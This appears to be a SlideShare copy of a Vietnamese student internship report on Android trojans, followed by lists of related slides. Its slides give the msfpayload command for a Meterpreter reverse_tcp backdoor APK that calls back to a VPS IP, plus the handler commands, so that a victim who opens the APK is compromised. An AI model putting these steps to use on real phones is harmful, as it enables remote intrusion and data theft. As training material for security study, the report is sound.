SlideShare a Scribd company logo
1 of 8
BÁO CÁO THỰC TẬP ATHENA
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP
ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN
NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI
RA NGOÀI
Sinh viên thực hiện: Nguyễn Đức Thắng
GVHD: Võ Đỗ Thắng
TP.HCM, 04/08/2014
Cài đặt Kali Linux trên máy ảo VMWare
TUẦN 3:
Cài đặt Metasploit trên VPS
1. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để
kiểm tra, tấn công và khai thác lỗi của các service.
2. Cài đặt
Ta vào trang chủ của Metasploit để tải Metasploit phiên bản mới nhất về :
http://www.metasploit.com/ ( hoặc ta có thể vào trang download của Metasploit :
http://www.rapid7.com/products/metasploit/download.jsp ).Ta chọn phiên bản
Community miễn phí và dùng cho nghiên cứu.
Sau khi tải về, ta cài đặt như những phần mềm khác.
Chọn folder cài đặt:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Chọn server và ngày hết hạn ( ta để mặc định):
Quá trình cài đặt của Metasploit:
Tiến trình hoàn tất, chọn Finish. Vậy là ta đã cài đặt thành công Metasploit.
3.Từ VPS điều khiển thiết bị ( điện thoai Android) qua internet
Đầu tiên, ta sử dụng Kali Linux để tạo file APK làm backdoor để
hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
(nếu ta đăng kí sử dụng Metasploit trên VPS máy ảo của Metasploit.com
thì địa chỉ là địa chỉ của máy ảo VPS được cung cấp).
Chúng ta vẫn sử dụng lệnh Msfpayload
android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R >
/root/Desktop/files.apk (ở đây địa chỉ VPS là 14.0.21.184)
Ta khởi động Metasploit Console trên VPS ( ta phải đăng nhập vào
địa chỉ máy ảo VPS bằng Remote Desktop Connection trước nếu dung
máy ảo VPS đăng kí sử dụng qua mạng ).
Kế tiếp ta thực hiện các bước xâm nhập giống như hack diện thoại
android bằng Kali Linux, chỉ khác ở địa chỉ IP là IP của VPS:
Use exploit/multi/handler
Set lhost 14.0.21.184 (địa chỉ IP của máy VPS)
Set lport 4444
Run (giống lệnh exploit trên Kali Linux)
Sau khi máy nạn nhân tải về file apk đã được tạo ra và mở lên,
máy android đó sẽ bị hack.
Vps

More Related Content

What's hot

Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quangrenlue
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
Robotics toolbox
Robotics toolboxRobotics toolbox
Robotics toolboxdang123456
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4Phuong Ngo
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1phanconghien
 
Phân tích ConfuserEX - Invalid Metadata (bài dịch)
Phân tích ConfuserEX - Invalid Metadata (bài dịch)Phân tích ConfuserEX - Invalid Metadata (bài dịch)
Phân tích ConfuserEX - Invalid Metadata (bài dịch)Levis Nickaster
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáoblue_abc
 
Part 38 isa server - intrusion detection -www.key4_vip.info
Part 38   isa server - intrusion detection -www.key4_vip.infoPart 38   isa server - intrusion detection -www.key4_vip.info
Part 38 isa server - intrusion detection -www.key4_vip.infolaonap166
 
Báo cáo tuần 4
Báo cáo tuần 4Báo cáo tuần 4
Báo cáo tuần 4Daewoo Han
 
Decrypt các MSIL methods một cách thử công - Bài dịch
Decrypt các MSIL methods một cách thử công - Bài dịchDecrypt các MSIL methods một cách thử công - Bài dịch
Decrypt các MSIL methods một cách thử công - Bài dịchLevis Nickaster
 
Mạng bot net nền tảng
Mạng bot net nền tảngMạng bot net nền tảng
Mạng bot net nền tảngThieu Mao
 
Kết nối linux đến linux bằng ssh
Kết nối linux đến linux bằng sshKết nối linux đến linux bằng ssh
Kết nối linux đến linux bằng sshphanleson
 

What's hot (20)

Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quang
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
Robotics toolbox
Robotics toolboxRobotics toolbox
Robotics toolbox
 
Bao cao tuan 3
Bao cao tuan 3Bao cao tuan 3
Bao cao tuan 3
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
1
11
1
 
Athena tuần 5
Athena tuần 5Athena tuần 5
Athena tuần 5
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
 
Phân tích ConfuserEX - Invalid Metadata (bài dịch)
Phân tích ConfuserEX - Invalid Metadata (bài dịch)Phân tích ConfuserEX - Invalid Metadata (bài dịch)
Phân tích ConfuserEX - Invalid Metadata (bài dịch)
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáo
 
Part 38 isa server - intrusion detection -www.key4_vip.info
Part 38   isa server - intrusion detection -www.key4_vip.infoPart 38   isa server - intrusion detection -www.key4_vip.info
Part 38 isa server - intrusion detection -www.key4_vip.info
 
Báo cáo tuần 4
Báo cáo tuần 4Báo cáo tuần 4
Báo cáo tuần 4
 
Decrypt các MSIL methods một cách thử công - Bài dịch
Decrypt các MSIL methods một cách thử công - Bài dịchDecrypt các MSIL methods một cách thử công - Bài dịch
Decrypt các MSIL methods một cách thử công - Bài dịch
 
Mạng bot net nền tảng
Mạng bot net nền tảngMạng bot net nền tảng
Mạng bot net nền tảng
 
Kết nối linux đến linux bằng ssh
Kết nối linux đến linux bằng sshKết nối linux đến linux bằng ssh
Kết nối linux đến linux bằng ssh
 

Similar to Vps

Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1kakawpah0911
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4Xuân Ngọc Nguyễn
 
Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuthach28
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athenaquocluong
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfPhamTruongGiang4
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnThái Tuấn Lưu
 

Similar to Vps (20)

Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Bai bao cao 4
Bai bao cao 4Bai bao cao 4
Bai bao cao 4
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Tuan 4
Tuan 4Tuan 4
Tuan 4
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
Bao cao
Bao caoBao cao
Bao cao
 
Cai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntuCai dat metasploit community tren windows và ubuntu
Cai dat metasploit community tren windows và ubuntu
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athena
 
Bao cao tuan 5
Bao cao tuan 5Bao cao tuan 5
Bao cao tuan 5
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 

Vps

  • 1. BÁO CÁO THỰC TẬP ATHENA NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI Sinh viên thực hiện: Nguyễn Đức Thắng GVHD: Võ Đỗ Thắng TP.HCM, 04/08/2014
  • 2. Cài đặt Kali Linux trên máy ảo VMWare TUẦN 3: Cài đặt Metasploit trên VPS 1. Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. 2. Cài đặt Ta vào trang chủ của Metasploit để tải Metasploit phiên bản mới nhất về : http://www.metasploit.com/ ( hoặc ta có thể vào trang download của Metasploit : http://www.rapid7.com/products/metasploit/download.jsp ).Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
  • 3. Sau khi tải về, ta cài đặt như những phần mềm khác. Chọn folder cài đặt: Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
  • 4. Chọn server và ngày hết hạn ( ta để mặc định): Quá trình cài đặt của Metasploit:
  • 5. Tiến trình hoàn tất, chọn Finish. Vậy là ta đã cài đặt thành công Metasploit.
  • 6. 3.Từ VPS điều khiển thiết bị ( điện thoai Android) qua internet Đầu tiên, ta sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS (nếu ta đăng kí sử dụng Metasploit trên VPS máy ảo của Metasploit.com thì địa chỉ là địa chỉ của máy ảo VPS được cung cấp). Chúng ta vẫn sử dụng lệnh Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R > /root/Desktop/files.apk (ở đây địa chỉ VPS là 14.0.21.184) Ta khởi động Metasploit Console trên VPS ( ta phải đăng nhập vào địa chỉ máy ảo VPS bằng Remote Desktop Connection trước nếu dung máy ảo VPS đăng kí sử dụng qua mạng ). Kế tiếp ta thực hiện các bước xâm nhập giống như hack diện thoại android bằng Kali Linux, chỉ khác ở địa chỉ IP là IP của VPS:
  • 7. Use exploit/multi/handler Set lhost 14.0.21.184 (địa chỉ IP của máy VPS) Set lport 4444 Run (giống lệnh exploit trên Kali Linux) Sau khi máy nạn nhân tải về file apk đã được tạo ra và mở lên, máy android đó sẽ bị hack.